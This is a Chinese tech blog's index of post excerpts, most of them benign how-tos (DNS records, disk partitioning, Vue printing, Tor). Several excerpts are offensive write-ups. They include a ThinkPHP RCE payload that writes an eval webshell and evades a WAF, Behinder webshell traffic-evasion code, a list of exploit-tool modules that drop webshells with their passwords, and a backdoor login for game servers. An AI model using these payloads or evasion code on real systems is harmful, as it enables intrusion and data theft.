• 网站底部安全认证代码

    网站底部安全认证代码 代码简介 网站底部安全认证代码,网站常用的各种美化代码,站长网全站图片采用高速cdn加速,图片秒开,代码里的图片链接无需改动,可将前面的网址改成自己的。代码展示<p></script><p id="footer_img"><a href="https://www.netzz.net/" target="_blank"><img src="https://www.netzz.net/usr/uploads/360.png" alt="360安全检测"><span></span></a> <a href="https://www.netzz.net/" target="_blank"><img src="https://www.netzz.net/usr/uploads/wzxy.png" alt="凭安信用认证"><span></span></a> <a href="https://www.netzz.net/" target="_blank"><img src="https://www.netzz.net/usr/uploads/ypy.png" alt="upyun网站联盟"><span></span></a> <a href="https://www.netzz.net/" target="_blank"><img src="https://www.netzz.net/usr/uploads/txy.png" alt="腾讯云安全认证"><span></span></a> <a href="https://www.netzz.net/" target="_blank"><img src="https://www.netzz.net/usr/uploads/zzlm1.png" alt="认证联盟"><span></span></a> </p></p>   ...

    2023-01-18 技术教程 17
  • 网站底部添加备案号教程

    在ICP备案代码前面添加class属性值即可。 代码如下   <a href="https://beian.miit.gov.cn/" target="_blank">您的备案号</a>   ...

    2023-01-18 技术教程 13
  • 教你如何免费发布视频直链

    教你如何免费发布视频直链 正常情况你上传视频都需要服务器的 以下是展示的 原理就是把你视频上传的 快手 抖音 等等  然后用浏览器打开 视频分享地址 可以获取直连{浏览器需要带嗅探的就行}   下面视频地址 就是快手的域名 服务器  很简单!   https://txmov2.a.kwimgs.com/upic/2023/01/13/22/BMjAyMzAxMTMyMjQ4MjRfMjcyNDI0NjE1M185MzUxNTYwMjUxMF8yXzM=_b_Bd2b3a8a6dfcf304633af1ce19cc34b22.mp4?clientCacheKey=3xu9xdy82bdtr44_b.mp4&tt=b&di=27b970bd&bp=10000   ...

    2023-01-14 技术教程 18
  • 网易云ncm,QQ音乐qmc,mgg,mflac,酷狗kgm解锁转换为flac格式

    酷狗音乐怎么转换mp3格式?使用酷狗音乐听歌的人比较多,通常我们都是在手机、电脑等有联网的情况听的,而一旦想下载下来在其他设备上听的话,就会碰到问题了。 在酷狗上下歌曲的时候,发现下的是kgm、kgma格式,查了一下才知道这是酷狗音乐的一种专用加密格式,只能在酷狗里面听,这就很扯淡了,即使我已经开通了vip会员,还要来这种限制就有点不地道了,没办法只能想办法把酷狗kgm、kgma格式转换成flac无损、mp3格式的。这个方法同样适用于网易云音乐(ncm)、QQ音乐(qmc, mflac, mgg)、酷狗音乐(kgm)、虾米音乐(xm)、酷我音乐(.kwm)转换成mp3、flac无损音质的,而且都是在线操作的,无需下软件的。 1.打开网址https://demo.unlock-music.dev/ 2.将下载下来的加密音乐文件上传即可成功解密并下载。3.详情可以自行查看项目域名:https://unlock-music.dev/GitHub地址:https://github.com/unlock-music/unlock-music/ 其他在线解密转换网站:转换云(ncm等格式转MP3):https://www.zhuanhuanyun.cn/音频编辑工具(大部分格式转换以及截取,变调):https://audio.worthsee.com/convert硕鼠音频下载(支持100多个主流平台的音视频解析):https://www.flvcd.com/WORTHSEE网(ncm等格式转MP3):https://ncm.worthsee.com/OpenYYY 开源云音乐(多种云音乐格式转MP3):https://openyyy.com/迅捷音频:https://www.xunjieshipin.com/audio-converter?zhljj220817-306630653 ...

    2023-01-12 技术教程 30
  • 分享几个纯净版Windows系统下载网站

    如今Windows系统越来越好安装了,抛弃多年前的光盘,现在只需要一个装机工具就可以轻松搞定,完全不需要具备电脑装机知识,按照安装向导进行就可以了。不过,有些u盘装机工具,由于没有提供镜像文件,用户只能自己从网上找和下载,一路上磕磕绊绊,不少用户就中了捆绑网站的“陷阱”。 这里我给大家分享几个我平时用的操作系统下载网站。 1.msdn(收集了原版Windows镜像,均纯净无捆绑)网站地址:https://msdn.itellyou.cn/   2.HelloWindows(精校 完整 极致 Windows系统下载仓储站)网站地址:https://hellowindows.cn/# 3.极简系统(提供极简的os下载)网址:https://www.sysmini.com/ 一生中你唯一需要回头的时候,是为了看自己到底走了多远。 ...

    2023-01-11 技术教程 23
  • 域名解析⏳

    以DNSpod(腾讯云)解析为例 使用目的 记录类型 使用目的 A 记录 将域名指向一个 IP 地址(外网地址)。 CNAME 记录 将域名指向另一个域名,再由另一个域名提供 IP 地址(外网地址)。 MX 记录 设置邮箱,让邮箱能收到邮件。 NS 记录 将子域名交给其他 DNS 服务商解析。 AAAA 记录 将域名指向一个 IPv6 地址。 SRV 记录 用来标识某台服务器使用了某个服务,常见于微软系统的目录管理。 TXT 记录 对域名进行标识和说明,绝大多数的 TXT 记录是用来做 SPF 记录(反垃圾邮件)。 隐、显性 URL 记录 将一个域名指向另外一个已经存在的站点。 冲突规则   说明: 冲突 :相同主机记录、相同线路,不同记录类型只能创建一条。例如,已有 www 的默认路线 A 记录,则不允许再添加 www 的默认路线 CNAME 记录。 可多条:相同主机记录、相同线路、相同记录类型,可创建多条记录。例如,已有 www 的默认路线 A 记录,还可添加 www 的默认路线 A 记录。 不冲突:相同主机记录、相同线路,不同记录类型可以共存。例如,已有 www 的默认路线 A 记录,还可添加 www 的默认路线 MX 记录。 DNS 解析 DNSPod 针对同时添加 CNAME 与 TXT 相同的主机记录已进行优化处理,并在已知可能影响正常解析的情况下,允许您进行添加,如使用此方式造成的解析质量问题,腾讯云不做服务等级协议(SLA)保障。   注 A记录IP值,CNAME记录域值,只能二选一,同时用会冲突 可以使用同一个记录,选择不同线路。 但不可使用同一个记录和使用同一个线路,来搭配不同的记录值   免费域名 后缀 评分 年龄 顶级 DNS 位置 .us.to 100 21 否 A,AAAA,CNAME,MX World .eu.org 50 27 否 A,AAAA,CNAME,MX World .tk 0 21 是 A,CNAME,MX,NS World .ml 0 9 是 A,CNAME,MX,NS World .ga 0 9 是 A,CNAME,MX,NS World .cf 0 8 是 A,CNAME,MX,NS World .gq 0 8 是 A,CNAME,MX,NS World .NOM.ZA 80 15 是 A,NS,SPF 南非 .iz.rs 100 14 否 A,CNAME,MX,NSTXT 塞尔维亚 .ze.cx 无 18 否 A,CNAME,NX, 圣诞岛 .zik.dj 无 17 否 A World .slx.nl 无 20 否 A,CNAME,MX 荷兰 .ipq.co 无 12 否 A World .biz.ly 0 14 否 A,CNAME,MX,NS 利比亚 注: 即使是非顶级域名,一样可以托管到cloudflare,如:.eu.org,.mon.za 以上几个顶级域名都可以在 https://www.freenom.com/ 申请 免费域名申请有一定难度,且有些莫名其妙的要求 例如: tk域名要求90天要有25次点击 .iz.rs要求塞尔维亚身份 另外,免费域名绝对不适合做网站,网站流量大有可能被回收 倘若想做网站、项目推荐使用 COM NET IO 等顶级域名 如必须要一个免费的、而且想长期用,推荐 .eu.org ...

    2023-01-11 技术教程 20
  • 记录一次学某通登陆密码逆向过程

    学某通以下简称“Study” 随着study的登录机制越来越完善,我们使用F12直接查看大法已经过时,使用了加密手段去进行账号密码的加密,本篇文章就言简意赅演示如何去查看账号的密码 实操 打开study,F12–网络–fanyalogin–负载,这时候账号密码信息都使用加密手段进行加密,如何确定使用哪种加密呢? 了解使用何种加密方法 搜索(没有就点击右边的+号调出)–搜索“password”,可以发现encryptByAES就是加密函数,这时候就好办了 断点法 我们接着搜索 encryptByAES–点击第一个 第一个框为加密密钥,第二个为加密方式 我们在141处设置断点,在这里进行停止,然后再一次点击登录按钮,等待奇迹发生 点击之后,弹出了这些,message后面就是明文了,好了,猪哥应该懂我意思了! ...

    2023-01-11 技术教程 19
  • 我们如何给电脑磁盘分区呢?

    大家一定发现了新买的电脑只有一个C盘对不对~ 我的建议是将系统盘和文件存储盘分成不同的磁盘区 其实分区的好处还是很多的 比如平时利用电脑搜索功能寻找资料时 可以更加的快捷高效 不光提高了容错率 更方便我们对特殊情况的解决~ 那么我给电脑小白带来一期如何给我们的新电脑分区 1.压缩磁盘 首先右键点击【此电脑】找到【管理】 点击进入页面后 选择【磁盘管理】找到想要分区的磁盘 右键点击【压缩卷】 在【输入压缩空间量】中输入想要的分区大小再点击【压缩】这样磁盘就压缩好啦~ 在压缩磁盘的时候要注意咯,如果磁盘C作为系统盘给200GB,以1GB=1024MB计算,那就是204800MB 相信这么简单的计算不会还不会吧 2.新建磁盘分区 在压缩完成后 磁盘里会多出来一个【未分配】空间~ 右键点击【未分配】 选择【新建简单卷】 点击【下一页】 在【分配驱动器号和路径】的 【分配以下驱动器号】中选择盘符 然后点击【下一页】 在【格式化分区】中选择默认或者自定义名称 再点击【下一】 然后一路默认 就可以看到新建的分区啦~ 3.改变磁盘空间 如果使用中发现磁盘空间不够   可以找到想要删除的磁盘 右键点击【删除卷】 这样就会多出一部分未分配空间 右键点击需要扩展的磁盘 点击【扩展卷】 输入想要增加的磁盘空间大小 这样就可以啦~ 设置好磁盘大小点击下一步就好了 温馨提示 磁盘删除后无法恢复 大家一定要提前做好文件备份哟~ 单磁盘最好只分系统盘和存储盘2个区 分区太多会造成磁盘空间的浪费捏~ 喜欢的朋友点赞加关注多多支持! ...

    2023-01-11 技术教程 20
  • 高危漏洞利用工具 -- Apt_t00ls(1月6日更新)

    免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。   0x01 工具介绍 增加CNVD-2023-00895 包括:泛微、蓝凌、用友、万户、致远、通达等多个高位漏洞。                                                                         e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)e-cology BshServlet-RCE (可直接执行系统命令)e-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)e-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)landray_datajson-RCE (可直接执行系统命令)landray_treexmlTmpl-RCE (可直接执行系统命令)landray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)wanhuoa_OfficeServer-RCE(默认写入冰蝎4.0.3aes)wanhuoa_OfficeServer-RCE(默认写入哥斯拉4.0.1 jsp aes 默认密码密钥)wanhuoa_DocumentEdit-SQlli(mssql数据库 可 os-shell)wanhuoa_OfficeServerservlet-RCE(默认写入冰蝎4.0.3aes)wanhuoa_fileUploadController-RCE(默认写入冰蝎4.0.3aes)seeyonoa_main_log4j2-RCE (仅支持检测,自行开启ladp服务利用)seeyonoa_wpsAssistServlet-RCE(默认写入冰蝎4.0.3aes)seeyonoa_htmlofficeservlet-RCE(默认写入冰蝎4.0.3aes)seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)tongdaoa_getdata-RCE (直接执行系统命令)tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)中间件:IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)安全设备:综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)网御星云账号密码泄露   0x02 安装与使用   1、文件上传指令生成 2、Tasklist敏感进程检测 /3、33、反弹shell命令生成 0x03 项目链接下载 请加入交流群下载...

    2023-01-09 技术教程 37
  • 谷歌地球的具体玩法和变现全拆解

    01 项目介绍 最近新出的一个冷门视频玩法,有很多圈内人都在偷偷赚米,我认识的小伙伴就有靠这个做中视频,单账号收益一天就有几十上百的。关键这个玩法操作特别容易,尤其是对于刚入门的小白来说,极其友好。 这个玩法就是谷歌地球视频,不清楚的看下方截图就知道了。 做这个项目,只需要准备一个抖音中视频账号,和一台电脑就可以了。内容制作相对来讲也是比较简单的,在这里我就不具体演示了。 这种类型的账号,非常适合单人或者小团队操作。因为单人和小团队整个运营成本不高,视频制作出来发布,有播放就有收益。而且这个内容制作起来门槛不高。 这种账号的第二个优势就在于,目前这种视频制作的人不多,相对来讲,竞争小,不内卷。 对于刚入门或者还在犹豫做什么内容好的人来说,简直就是福音。 而且这个软件还可以延伸出很多不同的玩法,比如飞行线路地理知识讲解,全景旅游等等。 02 变现方式 这种账号的变现方式有哪些呢? 首先第一个,就是中视频收益,发布内容,有播放量就有收益。 根据同行的数据来看,这种视频单账号一天,收益好一点的,可以达到大几百甚至上千,中等的在小几百,差一点的也有七八十。 对于刚入门想通过制作视频赚取收益,又没有很好门路的小伙伴,可以尝试一下。关键现在做这个类目人非常少,不像影视解说之类的,内卷都要卷到天上去了。 至于单个视频的制作,熟练的情况下,半小时就可以完成,慢一点1到2个小时也可以完成,每天下班花点时间制作出来,当做副业,我个人觉得还是非常不错的。 第二个变现方式就是收徒,你把这套方法学会之后,自己赚到钱了,完全可以打包卖给别人,卖个299、399一份的,也是不错的收入。 信息差永远存在! 第三个变现模式,就是短视频带货。因为这个领域属于科普类,涉及到地理知识,我们就可以找一些相关的产品,加入到商品橱窗里面。比如说地球仪、卫星地图、地理等相关的书籍。 03 注意事项 1、同行是最好的老师! 2、心动了就开干,开干就已经成功了一半,不干永远没机会! 3、坚持比什么都重要! 我是张大力,N年互联网创业、副业、赚钱一线实战经验!...

    2023-01-09 技术教程 16
  • 小米手机MIUI关闭广告方法大全

    步骤如下:1、安全中心:设置→系统应用→安全中心→关闭“资讯推荐”。2、小米音乐:设置→系统应用→音乐→更多高级设置→关闭“资讯推荐”。3、垃圾清理:设置→系统应用→安全中心→垃圾清理→关闭“资讯推荐”。4、浏览器:设置→系统应用→浏览器→消息通知管理→关闭“接收消息通知”。5、小米视频:设置→系统应用→视频→关闭“接收小米推送”。6、应用商店:设置→系统应用→应用商店→关闭“接收推送通知”。7、搜索:设置→系统应用→搜索→关闭“实时热点”。8、游戏中心:设置→系统应用→游戏→关闭“游戏福利推送”。9、小米天气:天气→右下角省略号(有些版本是右上角)→设置→关闭“天气资讯”。10、下载管理:下载管理→右上角省略号→设置→信息流设置,关闭“资源推荐”。11、文件管理:文件管理→“手机”板块→右上角省略号→设置→关闭“热门视频”和“热门表情”。12、桌面应用夹:打开应用夹→点击应用夹名→关闭“猜你喜欢”。13、安装应用界面:点击右上角的设置按钮→关闭推荐资讯。 14、在设置—小米账号—隐私协议等—系统广告—系统工具广告   ...

    2023-01-08 技术教程 16
  • 冰蝎流量免杀初探

    0x01 前言 冰蝎4.0发布以后,可以自定义传输协议了,也就是我们能对流量进行改造,本文依据rebeyond大佬文章对冰蝎流量进行改造,记录一下踩过的坑。 https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A 冰蝎传输协议模块 分为本地和远程,其中本地模块只能用java进行编写,远程模块根据webshell的语言类型进行编写,比如java、php、asp,全部编写好后要生成服务端,也就是生成我们自己的webshell,用生成后的webshell进行连接。 借用大佬的图说明一下加解密流程 整体流量加解密流程为先对payload进行base64,再转成十六进制,具体函数往下看。 0x02 加解密过程 1、本地加密函数   private byte[] Encrypt(byte[] data) throws Exception{ //传入一个字节数组data,对data依据key进行按位异或 String key="e45e329feb5d925b"; for (int i = 0; i < data.length; i++) { data[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15])); } //先转换成base64,利用反射调用base64编码 byte[] encrypted = null; Class baseCls; try { baseCls=Class.forName("java.util.Base64"); Object Encoder=baseCls.getMethod("getEncoder", null).invoke(baseCls, null); encrypted= (byte[]) Encoder.getClass().getMethod( "encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{data}); } catch (Throwable error) { baseCls=Class.forName("sun.misc.BASE64Encoder"); Object Encoder=baseCls.newInstance(); String result=(String) Encoder.getClass().getMethod( "encode",new Class[]{byte[].class}).invoke(Encoder, new Object[]{data}); result=result.replace("n", "").replace("r", ""); encrypted=result.getBytes(); } //再改写成hex,利用DatatypeConverter类的printHexBinary()方法进行转换 Object obj = null; try{ Class clazz = Class.forName("javax.xml.bind.DatatypeConverter"); /* 这里返回了一个Object类型,虽然encrypted定义的是字节数组, 但是这里传进去的时候不知道为什么报的是Object,所以定义一个Object来接收。 这里用printHexBinary()把base64字符串转成16进制字符串, printHexBinary()接收一个byte数组, printHexBinary()是一个静态方法,invoke第一个参数可以传入null, */ obj = clazz.getDeclaredMethod("printHexBinary",new Class[]{byte[].class}).invoke(null,encrypted); }catch (Throwable error){ System.out.println(error); } //因为要求返回字节数组,所以这里先把Object转成字符串,再转成字节数组,好像不能直接由object转byte byte[] encrypted_hex = obj.toString().toLowerCase().getBytes(); return encrypted_hex; }   2、本地解密函数   private byte[] Decrypt(byte[] data) throws Exception { //从十六进制转回base64 String decrypted_hex = new String(data); byte[] decrypted_base = null; try{ Class clazz = Class.forName("javax.xml.bind.DatatypeConverter"); /* 这里用parseHexBinary()把16进制字符串转回base64字符串 parseHexBinary()接收16进制字符串,转回正常字符串 parseHexBinary()是静态方法,invoke第一个参数可以为空 */ decrypted_base = (byte[])clazz.getDeclaredMethod("parseHexBinary",String.class).invoke(null,decrypted_hex); }catch (Throwable error){ System.out.println(error); } //从base64转回正常字符串 byte[] decodebs; Class baseCls ; try{ baseCls=Class.forName("java.util.Base64"); Object Decoder=baseCls.getMethod("getDecoder", null).invoke(baseCls, null); decodebs=(byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{decrypted_base}); } catch (Throwable e) { baseCls = Class.forName("sun.misc.BASE64Decoder"); Object Decoder=baseCls.newInstance(); decodebs=(byte[]) Decoder.getClass().getMethod("decodeBuffer",new Class[]{String.class}).invoke(Decoder, new Object[]{new String(decrypted_base)}); } String key="e45e329feb5d925b"; for (int i = 0; i < decodebs.length; i++) { decodebs[i] = (byte) ((decodebs[i]) ^ (key.getBytes()[i + 1 & 15])); } return decodebs; }   可以先看一下本地加密的效果 至此,本地加解密函数完成,下一步我们研究webshell怎么写。因为本文研究流量免杀,webshell的免杀在此处不做讨论。 3、远程加密函数   function Encrypt($data){ $key="e45e329feb5d925b"; for($i=0;$i<strlen($data);$i++) { $data[$i] = $data[$i]^$key[$i+1&15]; } $bs="base64_"."encode"; $after=$bs($data.""); return bin2hex($after);//base64后转16进制}   4、远程解密函数   function Decrypt($data){ $key="e45e329feb5d925b"; $bs="base64_"."decode"; $after=$bs(pack('H*',$data)."");//先解出16进制,再base64解码 for($i=0;$i<strlen($after);$i++) { $after[$i] = $after[$i]^$key[$i+1&15]; } return $after;}   0x03 效果 先生成服务端,生成我们自己的webshell 连接webshell 用burp抓包看一下流量 0x04 总结 本次加解密流程为先base64,再转成16进制字符串。先转成base64主要是为了保护原始payload,以免在从十六进制转回原payload的过程中发生递归解析,将原payload中的十六进制字符串也一并解析了。 本文仅针对冰蝎流量改造进行初步探讨,熟悉一下整个流程,真的要绕流量设备,估计还需要其他的技巧。...

    2023-01-06 技术教程 17
  • 搜狗搜索免费官网认证方法

    今天闲来无事,登陆各大搜索引擎站长平台,突然发现搜狗站长平台可以免费做官网认证了。虽然这个功能是2013年推出的,但我认为还是有必要和大家分享一下。提交方法也很简单,注册并登陆搜索站长平台→官网认证→添加认证认证的条件也很简单:(1)必须企业网站备案(2)符合国家法律法规,没有列入失信人名单(3)准备好企业营业执照 个人身份证即可. ...

    2023-01-06 技术教程 40
  • vue实现打印及导出

    安装命令: npm i vue-to-pdf --save npm i vue-easy-printer --save 绑定事件 <div id="exportPdf" ref="exportPdf"> </div> <input type="button" @click="printPdf">打印</input> <input type="button" @click="savePdf" >导出(pdf)</input> savePdf(){ this.$PDFSave(this.$refs.exportPdf, "我的文件"); }, printPdf(){ this.$easyPrint(\'exportPdf\',"我的文件",\'portrait\'); } 另外一个打印安装 npm install vue-print-nb --save 全局注册 import Print from 'vue-print-nb' Vue.use(Print); 使用 用v-print指定需要打印的div容器,本次叫printTest。最好使用行内样式,使用组件库部分样式可能不能生成。 <div id="printTest" > <p>锄禾日当午</p>       <p>汗滴禾下土 </p>       <p>谁知盘中餐</p>       <p>粒粒皆辛苦</p>     </div>     <button v-print="'#printTest'">打印</button> 不打印区域 <div class="no-print">不要打印我</div>  ...

    2023-01-06 技术教程 17
  • 什么是Tor?Tor浏览器更新有什么用?

    前言:近期Tor项目团队近日宣布,发布Tor浏览器11.5版本。Tor被美国国家安全局(NSA)誉为“互联网匿名系统之王“。Tor ( The Onion Router)系统就是洋葱路由技术的具体实现。 近期Tor项目团队近日宣布,发布Tor浏览器11.5版本,而此次更新1.帮助用户自动绕过互联网审查2.HTTPS 默认开启3.对网络设置菜单进行了重大改进。说起TOR浏览器都略有耳闻,那么Tor是什么样的技术原理?到底要如何应用? 什么是Tor 如今互联网已经是我们最常用的交流平台,一切痕迹在互联网上都有迹可循。为了掩饰上网时的个人信息与身份,保护个人隐私和安全,各种网络匿名冲浪技术应运而生,而洋葱路由(Onion Routing)技术和Tor ( The OnionRouter)系统则在它们当中脱颖而出,并被美国国家安全局(NSA)誉为“互联网匿名系统之王“。 要知道,电脑能够上网是以互联网编号分配机构(IANA,Internet Assigned Numbers Authority)分配的IP地址为前提,互联网的IP数据包由包头和数据载荷组成。数据载荷可经加密以防被第三方窥视,但包头包含发送方和接收方的IP地址、数据载荷长度、发送时间等信息,如果网站手动攻击用户的上网地点、访问网站、身份背景以及通联关系可能会被盗取。 洋葱路由( Onion Routing)技术综合运用了随机多跳路由、多层封包、多重加密等技术手段,可以实现可靠的在线匿名。1996年Reed,M.G.P.F. Syverson,和D. M. Goldschlag提出的匿名通信算法,基本原理等同于Chaum,D. L.的 Mix 匿名通信算法,随后由美国海军提出的和孵化的,它的初衷是保护政府通信以及为情报界和军队的网络活动提供匿名掩护和身份保护。 洋葱头路由的目的是为基于TCP的应用提供低延迟的匿名通信服务,如web访问,即时通信等。洋葱头路由算法基于通道(Circuit)实现数据报文的路由和传输。算法在网络中通过若干个节点建立通道,通过通道传输后续的用户数据。 Tor ( The Onion Router)系统就是洋葱路由技术的具体实现。Tor Project公司开发的Tor软件—Tor Project、一些大学和机构提供的一组核心Tor路由器与全球志愿者提供的数以千计的Tor路由器,共同组成了一个免费、开源的互联网匿名系统—Tor。Tor目前以参与者志愿提供中继节点的方式广泛地部署在Internet 中,是Internet中最成功的公共匿名通信服务。 Tor的设计引入完美的前向机密(perfectforwarsecrecy、拥塞控制(congestiopcontro)、口亟服务(directory service)、完整性校验(gintesrity checking)。可配置的出口策略(configurable exit policies)和端到端完整性校验等机制,解决了第一代洋葱头路由匿名通信系统设计的种种问题。 Tor有两种实体,分别是Tor用户(Tor user)和Tor节点(Tor node)。Tor节点提供中继服务,是Tor 网络的主体。Tor用户在系统中运行本地代理Onion Proxy (OP)程序,该程序选择中继节点,通过中继节点建立通道,接收应用TCP数据流,并将该数据流通过已建立通道传输。 每个Tor 节点都具有一组身份秘钥(identitykey)和-一组洋葱头秘钥(onion key)。身份秘钥用来签署Tor 节点的路由描述符。路由描述符是一个集合,包括该节点的洋葱头秘钥、地址、带宽、出口机制等,注册在目录服务中。洋葱头秘钥用来建立传输通道以及协商传输的会话秘钥。   二、Tor应用的双面性 任何技术都是双面性的,Tor提供了保护用户隐私的匿名通信服务。通过Tor网络传输的用户通信,既有合理合法的用户行为,也有滥用的行为。由于Tor网络的机制是出口节点代表用户访问最终的目的服务,因此当出现滥用行为时,目的服务看到的是出口节点发起的恶意行为,其直接结果往往是目的服务阻止出口节点访问,从而使所有通过该出口节点访问同样目的服务的通信都被阻止。 Tor网络中部分传输流量的内容为不安全的应用协议,如Telnet、POP3 等。因此部分恶意Tor节点,当其作为传输通道的出口节点时,则运行相应的记录程序,对传输的敏感数据进行记录。如记录的Telnet或 POP3协议中密码传输的用户名和口令,并用作商业的用途,出售给相关的公司和机构。现在国内一些科技公司开发了检测IP代理的软件,用来检测Tor连接,防止欺诈、加强流量过滤、避免虚假账号注册等问题。   三、关于Tor浏览器11.5版本 本次Tor的更新是关于三大方面: 1.自动绕过互联网审查(Auto block bypassing)   2.HTTPS 默认开启(HTTPS on by default) 版本11.5 中的另一个重要新功能是将“HTTPS 模式”设为默认浏览模式,以便通过隧道进行连接。这确保了用户和托管网站的服务器之间的所有数据交换都将被加密,以防御中间人 (MitM) 攻击并保护用户免受恶意出口中继的 SSL剥离。 网络设置菜单更改为“连接设置“(Better settings) Tor 浏览器 11.5 的第三个重大改进是对网络设置菜单进行了重大改进,现在称为“连接设置”,它应该更容易找到和理解特定设置。最值得注意的是,桥接配置和连接选项已经过重新设计,以实现快速轻松的审查和管理。 在保存的桥上使用表情符号,新界面首次提供了配置的可视化,便于识别正确的桥并在需要时方面快捷的选择它。 如今TORDE 的用户数已经超过十万,如军事、情报机构、记者等以及超过75个国家的6011个继电器提供在线匿名和隐私保护。...

    2023-01-04 技术教程 62
  • 私服通用0Day复现getshell

    看了个私服站,网上搜下漏洞,还真有day,但是没有写getshell方法,我复现看看吧 后台地址:http://url/admin 一个通用的万能账号弱口令: 账号是 lu123 密码 cui123 利用day成功进入后台 传个图片马,然后有个数据库,直接备份数据库,getshell到手 ...

    2022-11-24 技术教程 53
  • Web漏洞扫描器 -- SZhe_Scan

    0x01 工具介绍 碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜集,漏洞扫描,可自主添加POC。 0x02 安装与使用 1、安装 git clone https://github.com/Cl0udG0d/SZhe_Scancd SZhe_Scandocker-compose up -d 2、使用方法 访问ip:8000 即可,默认账户密码为:admin@admin.com / admin选择需要的POC和插件,添加任务进行扫描即可 0x03 项目链接下载 加入下方交流群...

    2022-11-23 技术教程 42
  • 可控文件拿shell

    挖洞的时候遇到一个平台 爆破进入后台 下一步肯定是找上传点然后拿shell是吧 确定上传 java站,改成jsp后缀试试 好,可以发现并不是filename控制文件后缀 那估计是str控制了 访问 http:/XXX.XXX/wb/upload/7D4B487AFAC49B42E472A8AB1D60D702.jsp 直接下载。。(一般遇到这种情况就放弃了) 再观察一下请求包 是不是能控制文件名 果然可以,能控制文件名是不是就可以跨目录了 http://xxx.xxx/wb/upload/../../test.jsp 等于http://xxx.xxx/test.jsp 尝试连接 直接administrator权限 ...

    2022-11-21 技术教程 35
  • 抽奖诈骗网站的渗透

    网站是这样的,他是利用短视频发布免费皮肤领取的视频,扫码进入这个网页,然后扫码进群再进行诈骗。 报错判断为think PHP框架 试试RCE POST: http://xxxx.xxxx.com/?s=index/index/ s=-1&_method=__construct&method=get&filter[]=phpinfo 为php5,尝试写shell POST http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php eval($_POST[x])?>')&_method=__construct&method=POST&filter[]=assert 宝塔waf 经过多次实验,宝塔应该是拦截了_POST[关键字,下面我们尝试绕过 在php里面我们可以使用'.'拼接符来连接前后的语句 <?php ev'.'al($_PO'.'ST[x])?>相当于<?php eval($_POST[x])?> POST: http://xxx.xxx.com/?s=index/index s=file_put_contents('1.php','<?php ev'.'al($_PO'.'ST[x])?>')&_method=__construct&method=POST&filter[]=assert 写shell成功 访问http://xxx.xx/1.php 菜刀连接成功 宝塔限制的太死了,提权不了 ...

    2022-11-21 技术教程 53
  • 对一次色情站点的渗透测试(苹果CMS)

    在某聊天软件学习技术看到有人卖色情站源码,自称苹果CMS三开,呢我肯定要看看,为后续打击违规站点做功课 现来看看代理后台 后台无可利用点,TP框架试着用TP工具扫了一下并无发现漏洞 这个代理后台渗透无望,尝试信息收集,在找了8页后找到了个激活码页面,应该是给下线激活域名的 看到这个查询框,果断burp,仍sqlmap跑一下 运气比较好,存在sql注入漏洞 那么现在就比较简单了,典型的苹果cms表前缀 那么问题来了,如何找到他后台,后台输入admin.php,admin 均为页面不存在 那只好利用我的社工手段了(忽悠大法) ok,后台地址到手,利用SQL注入跑出密码,成功登录后台 后台是苹果10cms,网上看了getshell方法,模板什么的,均无果。 总结: 注册用户信息6千多 代理273个 包括代理登录日志,管理日志已经全脱出来了。 奉劝各位,请勿跨越法律红线。...

    2022-11-20 技术教程 70

联系我们

在线咨询:点击这里给我发消息

QQ交流群:

工作日:8:00-23:00,节假日休息

扫码关注